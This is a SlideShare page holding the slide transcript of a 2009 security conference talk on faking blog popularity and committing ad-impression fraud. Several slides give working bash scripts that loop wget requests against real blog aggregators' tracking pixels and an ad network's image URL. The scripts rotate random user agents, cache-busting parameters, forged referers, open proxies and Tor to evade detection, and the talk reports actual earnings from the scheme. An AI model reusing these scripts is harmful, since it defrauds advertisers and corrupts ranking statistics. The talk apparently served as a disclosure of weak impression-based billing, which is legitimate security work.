0
If	
  you’re	
  not	
  famous,	
  fake	
  it.	
  
  Shaun	
  Dewberry	
  	
  
  Unix/Security	
  guy	
  
  Pretoria	
  University	
  (expelled	
  for	
  hacking!)	
  
 ...
  Technorati.com	
  
  In	
  SA:	
  
    Amatomu.com	
  
    Afrigator.co.za	
  
  Blogger	
  pissing	
  contest	
  
<!-­‐-­‐	
  Start	
  AMATOMU.COM	
  code	
  -­‐-­‐>	
  
<img	
  height='1'	
  style='display:none'	
  width='1'	
  
  src=...
  Slow	
  
  Not	
  really	
  automated	
  
  Boring	
  
  Obvious	
  
  Traceable	
  
while	
  [	
  1	
  ]	
  do	
  
wget	
  http://www.amatomu.com/log.php?
  cid=a433e87b0eb>e493dc055153ae332be0eeda46c	
  
d...
  Don’t	
  crash	
  the	
  server!	
  
  More	
  random	
  log	
  entries	
  
#!/bin/sh	
  
Set	
  RANDOM=$$	
  
while	
...
#!/bin/bash	
  
set	
  RANDOM=$$	
  
while	
  [	
  1	
  ]	
  
do	
  
let	
  "delay	
  =	
  RANDOM	
  %	
  6";	
  
	
  wget...
  wget	
  User-­‐Agent	
  visible	
  in	
  server	
  logs	
  
  All	
  visits	
  from	
  same	
  source	
  IP	
  address...
  http://www.user-­‐agent.org	
  
"Mozilla/4.0	
  (compatible;	
  MSIE	
  7.0;	
  Windows	
  NT	
  5.1;	
  .NET	
  CLR	
 ...
set	
  RANDOM=$$	
  
while	
  [	
  1	
  ]	
  
do	
  
let	
  "delay	
  =	
  RANDOM	
  %	
  30"	
  
let	
  "ua	
  =	
  RANDO...
“Tor	
  protects	
  you	
  by	
  bouncing	
  your	
  
  communications	
  around	
  a	
  distributed	
  
  network	
  of	
...
wget	
                    tsocks	
                      tor	
  	
     Aggregator	
  




• 	
  tsocks.sourceforge.net	
  –...
  #20	
  of	
  31	
  “ top	
  non-­‐US	
  startups	
  to	
  watch	
  
   worldwide”	
  by	
  Business	
  2.0	
  (money.cn...
  Invitations	
  to	
  launches	
  
  More	
  traffic	
  (ironic,	
  isn’t	
  it?)	
  
  Gadgets	
  for	
  review	
  
  ...
  Ad	
  network	
  linking	
  bloggers	
  and	
  advertisers	
  
  Revenue	
  based	
  on	
  CPM	
  (ad	
  impressions)	...
<!-­‐-­‐/*	
  Adgator.co.za	
  Javascript	
  Tag	
  v2.6.3	
  */-­‐-­‐>	
  
	
  <script	
  type='text/javascript'><!-­‐-­‐...
  No	
  ads	
  are	
  served	
  to	
  wget??	
  
  OpenX	
  Ad	
  Server	
  
  If	
  no	
  cookie	
  gets	
  set,	
  th...
  Accept	
  cookies	
  (and	
  turf	
  them)	
  
  &cb=RANDOM	
  parameter	
  (Cache	
  blocking)	
  
  tor	
  nodes	
 ...
let	
  "delay	
  =	
  RANDOM	
  %	
  40"	
  	
  #	
  Up	
  to	
  40	
  second	
  delay	
  –	
  let’s	
  not	
  be	
  greed...
• 	
  90	
  Ad	
  impressions/day	
  

• 	
  Paid	
  Ads	
  Served:	
  224	
  

• 	
  Earnings:	
  R11.09	
  
• 	
  800	
  impressions/day	
  	
  
	
  	
  (2	
  hour	
  run)	
  

• 	
  1677	
  Paid	
  Ads	
  Served	
  

• 	
  Earnin...
  Automated	
  auditing	
  with	
  complex	
  analysis	
  
   tools	
  
  Don’t	
  use	
  impression	
  based	
  costing...
  R8	
  per	
  hour	
  (conservative)	
  
  24	
  hours	
  
  30	
  days	
  


  R	
  5	
  760	
  per	
  month	
  
  ...
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Smashing the stats for fun (and profit)
Upcoming SlideShare
Loading in...5
×

Smashing the stats for fun (and profit)

866

Published on

Shaun Dewberry
ZaCon 2009
http://www.zacon.org.za/Archives/2009/slides/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
866
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
8
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Transcript of "Smashing the stats for fun (and profit)"

  1. 1. If  you’re  not  famous,  fake  it.  
  2. 2.   Shaun  Dewberry       Unix/Security  guy     Pretoria  University  (expelled  for  hacking!)     aka  LowVoltage  
  3. 3.   Technorati.com     In  SA:     Amatomu.com     Afrigator.co.za     Blogger  pissing  contest  
  4. 4. <!-­‐-­‐  Start  AMATOMU.COM  code  -­‐-­‐>   <img  height='1'  style='display:none'  width='1'   src='http://www.amatomu.com/log.php? cid=a433e87b0ebYe493dc055153ae332be0ee da46c'  />   <!-­‐-­‐  End  AMATOMU.COM  code  -­‐-­‐>  
  5. 5.   Slow     Not  really  automated     Boring     Obvious     Traceable  
  6. 6. while  [  1  ]  do   wget  http://www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   done;  
  7. 7.   Don’t  crash  the  server!     More  random  log  entries   #!/bin/sh   Set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  30";    #  Random  0  to  30  Second  delay   wget  http://www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   echo  "Waiting  $delay  seconds"   sleep  $delay   done;  
  8. 8. #!/bin/bash   set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  6";    wget  -­‐-­‐delete-­‐after  http://afrigator.com/track/5013-­‐none.gif   sleep  $delay;     done;  
  9. 9.   wget  User-­‐Agent  visible  in  server  logs     All  visits  from  same  source  IP  address  
  10. 10.   http://www.user-­‐agent.org   "Mozilla/4.0  (compatible;  MSIE  7.0;  Windows  NT  5.1;  .NET  CLR  1.1.4322;  .NET  CLR   2.0.50727;  .NET  CLR  3.0.04506.30   Mozilla/5.0  (Windows;  U;  Windows  NT  6.0;  en-­‐US;  rv:1.9.0.4)  Gecko/2008102920  Firefox/3.0.4   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US;  rv:1.9.0.4)  Gecko/2008102920  Firefox/3.0.4   Mozilla/5.0  (X11;  U;  Linux  i686;  en-­‐US;  rv:1.9.0.2)  Gecko/2008092313  Ubuntu/8.04  (hardy)   Firefox/3.1   Mozilla/5.0  (Windows;  U;  Windows  NT  6.0;  en-­‐US;  rv:1.9.0.2)  Gecko/2008091620  Firefox/3.0.2   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US;  rv:1.9.0.1)  Gecko/2008070208  Firefox/3.0.0   Mozilla/5.0  (Windows;  Windows  NT  5.1;  en-­‐US;  rv:1.8.1.9)  Gecko/20071025  Firefox/2.0.0.9   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en_US;  rv:1.8.1.6)  Gecko/20070725  Firefox/2.0.0.7   Mozilla/5.0  (Windows;  U;  Windows  NT  5.1;  en-­‐US)  AppleWebKit/525.19  (KHTML,  like  Gecko)   Chrome/0.4.154.18  Safari/525.19  
  11. 11. set  RANDOM=$$   while  [  1  ]   do   let  "delay  =  RANDOM  %  30"   let  "ua  =  RANDOM  %  `wc  -­‐l  useragents.txt  |  awk  '{print  $1}'`  +  1"   uastring=`sed  -­‐n  ${ua}p  useragents.txt;`    wget  -­‐q  -­‐-­‐delete-­‐after  -­‐-­‐user-­‐agent="$uastring"  http:// www.amatomu.com/log.php? cid=a433e87b0eb>e493dc055153ae332be0eeda46c   sleep  $delay   done;  
  12. 12. “Tor  protects  you  by  bouncing  your   communications  around  a  distributed   network  of  relays  run  by  volunteers  all  around   the  world:  it  prevents  somebody  watching   your  Internet  connection  from  learning  what   sites  you  visit,  and  it  prevents  the  sites  you   visit  from  learning  your  physical  location.”                -­‐-­‐torproject.org  
  13. 13. wget   tsocks   tor     Aggregator   •   tsocks.sourceforge.net  –  Transparent  Socks  Proxy  
  14. 14.   #20  of  31  “ top  non-­‐US  startups  to  watch   worldwide”  by  Business  2.0  (money.cnn.com)     Top  10  International  Products  for  2008  –   ReadWriteWeb     Acquired  by  Naspers     Blah  blah  blah…     WTF?  Security  Anyone?  
  15. 15.   Invitations  to  launches     More  traffic  (ironic,  isn’t  it?)     Gadgets  for  review     Press  accreditation     Fake  a  career  as  a  social  media  expert     Social  engineering  hack  
  16. 16.   Ad  network  linking  bloggers  and  advertisers     Revenue  based  on  CPM  (ad  impressions)     CPM  is  horribly  broken  
  17. 17. <!-­‐-­‐/*  Adgator.co.za  Javascript  Tag  v2.6.3  */-­‐-­‐>    <script  type='text/javascript'><!-­‐-­‐//<![CDATA[        var  m3_u  =  (location.protocol=='https:'?'https://ads.adgator.co.za/delivery/ajs.php':'http://ads.adgator.co.za/delivery/ajs.php');        var  m3_r  =  Math.floor(Math.random()*99999999999);        if  (!document.MAX_used)  document.MAX_used  =  ',';        document.write  ("<scr"+"ipt  type='text/javascript'  src='"+m3_u);        document.write  ("?zoneid=471");        document.write  ('&amp;cb='  +  m3_r);        if  (document.MAX_used  !=  ',')  document.write  ("&amp;exclude="  +  document.MAX_used);        document.write  (document.charset  ?  '&amp;charset='+document.charset  :  (document.characterSet  ?   '&amp;charset='+document.characterSet  :  ''));        document.write  ("&amp;loc="  +  escape(window.location));        if  (document.referrer)  document.write  ("&amp;referer="  +  escape(document.referrer));        if  (document.context)  document.write  ("&context="  +  escape(document.context));        if  (document.mmm_fo)  document.write  ("&amp;mmm_fo=1");        document.write  ("'></scr"+"ipt>");   //]]>-­‐-­‐></script><noscript><a  href='http://ads.adgator.co.za/delivery/ck.php?n=ad677422&cb=INSERT_RANDOM_NUMBER_HERE'   target='_blank'><img  src='http://ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ad677422'  border='0'  alt=''  /></a></noscript>   Only  care  about  ad  image:  http://ads.adgator.co.za/delivery/avw.php? zoneid=471&n=ac71ad4f  
  18. 18.   No  ads  are  served  to  wget??     OpenX  Ad  Server     If  no  cookie  gets  set,  then  no  ad  gets  served     Certain  User  Agents  are  ignored     First  ad  served,  but  no  ads  thereafter   (caching?)     Geo-­‐targeting  
  19. 19.   Accept  cookies  (and  turf  them)     &cb=RANDOM  parameter  (Cache  blocking)     tor  nodes  in  ZA?     Zombie  TelkomADSL  botnet?     Open  proxy  servers  –  Proof  of  Concept  
  20. 20. let  "delay  =  RANDOM  %  40"    #  Up  to  40  second  delay  –  let’s  not  be  greedy   let  "prand  =  RANDOM  %  `wc  -­‐l  proxies.txt  |  awk  '{print  $1}'`  +  1"     http_proxy=`sed  -­‐n  ${prand}p  proxies.txt;`  #  select  a  random  proxy   let  "ua  =  RANDOM  %  `wc  -­‐l  useragents.txt  |  awk  '{print  $1}'`  +  1"   uastring=`sed  -­‐n  ${ua}p  useragents.txt;`  #  random  useragent   let  "rand  =  RANDOM  %  999999999"  #  random  integer  for  cache  blocking    if  [  $http_proxy  ==  "tsocks"  ];  then    #    1/3rd  of  the  time  route  through  tor        export  http_proxy=        /usr/bin/tsocks  /usr/local/bin/wget  -­‐-­‐no-­‐clobber  -­‐-­‐no-­‐cache  -­‐-­‐max-­‐redirect=0  -­‐-­‐ user-­‐agent="$uastring"  -­‐-­‐referer=http://ramboguy.co.za  "http:// ads.adgator.co.za/delivery/avw.php?zoneid=471&n=ac71ad4f&cb=$rand"    else        #  otherwise  request  the  ad  straight  through  the  SA  proxy    /usr/bin/wget  -­‐d  -­‐-­‐no-­‐clobber  -­‐-­‐no-­‐cache  -­‐-­‐user-­‐agent="$uastring"  -­‐-­‐ referer=http://ramboguy.co.za  "http://ads.adgator.co.za/delivery/avw.php? zoneid=471&n=ac71ad4f&cb=$rand"    fi  
  21. 21. •   90  Ad  impressions/day   •   Paid  Ads  Served:  224   •   Earnings:  R11.09  
  22. 22. •   800  impressions/day        (2  hour  run)   •   1677  Paid  Ads  Served   •   Earnings:  R86.58      
  23. 23.   Automated  auditing  with  complex  analysis   tools     Don’t  use  impression  based  costing  models   (duh!)  
  24. 24.   R8  per  hour  (conservative)     24  hours     30  days     R  5  760  per  month     Mahala     The  beer’s  on  me!  
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×